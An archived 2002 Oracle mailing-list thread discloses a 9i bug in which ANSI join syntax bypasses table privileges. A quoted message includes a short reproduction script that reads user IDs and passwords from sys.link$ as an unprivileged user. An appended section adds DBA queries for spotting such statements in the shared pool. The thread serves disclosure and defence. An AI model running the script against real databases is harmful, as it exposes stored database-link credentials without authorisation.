RE: security bug - join syntax

From: Freeman, Robert <Robert_Freeman_at_csx.com>
Date: Mon, 22 Jul 2002 10:18:44 -0800
Message-ID: <F001.0049E222.20020722101844@fatcity.com>


Bug is fixed in 9.0.1.3 (or was it .2, I forget), and is not present in 9.2 (9iR2).
A backport for 9.0.1.1 is available as I recall.

Robert G. Freeman - Oracle OCP
Oracle Database Architect
CSX Midtier Database Administration
Author
Oracle9i RMAN Backup and Recovery (Oracle Press - Oct 2002)
Oracle9i New Features (Oracle Press)
Mastering Oracle8i  (Sybex)

Clark Griswold: Eddie, has anyone ever told you that you're bad luck?
Cousin Eddie: Those were my mother's dying words. But I guess if your body's covered in third degree burns, and your foot's caught in a bear trap, you tend to start talkin' crazy.

-----Original Message-----
Sent: Friday, July 19, 2002 2:58 PM
To: Multiple recipients of list ORACLE-L

Is this still a problem in 9iR2? I do not have it installed yet :(

> -----Original Message-----
> From: Jared.Still_at_radisys.com [SMTP:Jared.Still_at_radisys.com]
> Sent: Friday, July 19, 2002 12:05 PM
> To: Multiple recipients of list ORACLE-L
> Subject: Re: security bug - join syntax
>
> Thanks Linda.
>
> Usenet seems to be a little behind the curve though.
>
> Jonathan Lewis discovered this and posted on the list
> ( you saw it here first! ) over a month ago.
>
> Jared
>
>
>
>
>
> Linda.Miller-Coker_at_jpmorgan.com
> Sent by: root_at_fatcity.com
> 07/19/2002 09:23 AM
> Please respond to ORACLE-L
>
>
> To: Multiple recipients of list ORACLE-L
> <ORACLE-L_at_fatcity.com>
> cc:
> Subject: Re: security bug - join syntax
>
>
>
> This just in from comp.databases.oracle.server.
>
> See metalink bug 2121935.
>
> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> allows you to view data from tables on which you have no
> privilege. For example, try this COMPLETE script:
>
> connect / as sysdba
> create user us1 identified by us1;
> grant create session to us1;
>
> connect us1/us1
>
> select userid, password
> from
> sys.link$ cross join dual
> ;
>
>
>
>
> "Adams, Matthew (GEA, MABG, 088130)" <MATT.ADAMS_at_APPL.GE.COM>@fatcity.com
> on 07/19/2002 11:04:17 AM
>
> Please respond to ORACLE-L_at_fatcity.com
>
>
>
> Sent by: root_at_fatcity.com
>
>
> To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
> cc:
>
>
>
>
> Anybody remember the bug number for the security issue
> with the new join syntax in 9i?
>
> ----
> Matt Adams - GE Appliances - matt.adams_at_appl.ge.com
> The ozone layer or cheese in a spray can.
> Don't make me choose.
>
>
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
> INET: Linda.Miller-Coker_at_jpmorgan.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
> INET: Jared.Still_at_radisys.com
>

-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Deshpande, Kirti
  INET: kirti.deshpande_at_verizon.com

Received on Mon Jul 22 2002 - 13:18:44 CDT
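
Added example, not part of the original thread: a DBA-side check for the issue discussed above. The first query reports the installed release so it can be compared with the releases named in the reply; the second looks in the shared pool for ANSI-join statements that touch SYS-qualified objects and were parsed by accounts other than SYS and SYSTEM. The excluded account list and the text patterns are assumptions to adjust per site.

```sql
-- Run as a DBA account with SELECT on the V$ views and DBA_USERS.
-- Both queries use traditional (non-ANSI) join syntax on purpose.

-- 1. Installed release of each component, for comparison with the
--    fixed releases mentioned in the thread.
SELECT product, version, status
  FROM product_component_version;

-- 2. Cached statements that (a) contain the JOIN keyword, (b) reference
--    an object qualified with SYS., and (c) were parsed by an account
--    other than SYS or SYSTEM.
--    Newlines and tabs are turned into spaces first so that a statement
--    laid out like the test script in the thread still matches.
--    Caveats: V$SQL.SQL_TEXT holds only the first 1000 characters, aged-out
--    cursors are gone, and '%SYS.%' also matches names such as MYSYS.T,
--    so treat the rows as leads to review rather than proof.
SELECT u.username,
       s.first_load_time,
       s.executions,
       s.sql_text
  FROM v$sql s, dba_users u
 WHERE u.user_id = s.parsing_user_id
   AND u.username NOT IN ('SYS', 'SYSTEM')          -- assumption: adjust per site
   AND TRANSLATE(UPPER(s.sql_text),
                 CHR(10) || CHR(13) || CHR(9), '   ') LIKE '% JOIN %'
   AND UPPER(s.sql_text) LIKE '%SYS.%'
 ORDER BY s.first_load_time;
```

A hit from an account that holds no grant on the referenced SYS object (check DBA_TAB_PRIVS and DBA_ROLE_PRIVS for that username) is the case worth following up.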
